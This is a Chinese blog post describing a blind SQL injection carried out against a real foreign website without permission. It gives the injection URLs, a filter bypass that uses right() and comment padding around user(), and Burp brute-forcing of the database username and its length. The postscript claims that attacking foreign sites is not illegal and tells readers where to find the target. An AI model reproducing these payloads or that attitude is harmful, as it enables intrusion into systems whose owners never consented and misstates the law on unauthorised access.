渗透实战之对外国一网站进行的SQL盲注测试

起因:大早上体育课改成了线上,又正逢看到大佬发了一篇SQL注入文章,就想着复现一下,练练手,本篇就是记录一下渗透过程。

先判断闭合类型

1/1如下

 1/0如下

两次回显不一样,说明是数字型注入,尝试使用case when

https://ip/index.php?id=1/case+when+1=1+then+1+else+0+end&lang=sk

 

有回显,有搞头,到这里我和那位师傅的情况一样,但是下面他用了substr()这个函数,但是我用的时候已经被过滤了

 

尝试了很多绕过方法都不行,于是尝试用其他函数替代,发现有个right没有被过滤

 

 接下来盲注爆破user数据用户名

id=1/case+when+right(user(),1)!='1'+then+1+else+0+end

但是user()也被过滤,

user/**/()也不行,那就尝试在/**/加东西看看能不能绕过

/index.php?id=1/case+when+right(user/*§§*/(),1)!=%27a%27+then+1+else+0+end&lang=sk

 burp跑一下

 

发现很多绕过方法,随便选一个

 

成功绕过,那就随便爆破两位意思意思,点到为止

/index.php?id=1/case+when+right(user/*--/*/(),2)!=%27§a§0%27+then+1+else+0+end&lang=sk

 

最后一位为0 ,看一下倒数第二位

为8,其他就不测试了,其实length()函数也没有被过滤,看一下user多少位

id=1/case+when+length(user/*--/*/())=§1§+then+1+else+0+end

 

 为26位。

总结:一次不错的渗透测试,本来user()那里绕不过去都想放弃了,但还是坚持了下去,所以还是要多试试。

PS:本来这个码我懒得打的,毕竟按照其他师傅说的,国外的站嘛,随便日又不犯法,感兴趣的师傅可以去搜公众号湘安无事找url。hh其实有的师傅估计能从回显中看出来url,信息收集yyds。 

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

清丶酒孤欢ゞ

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值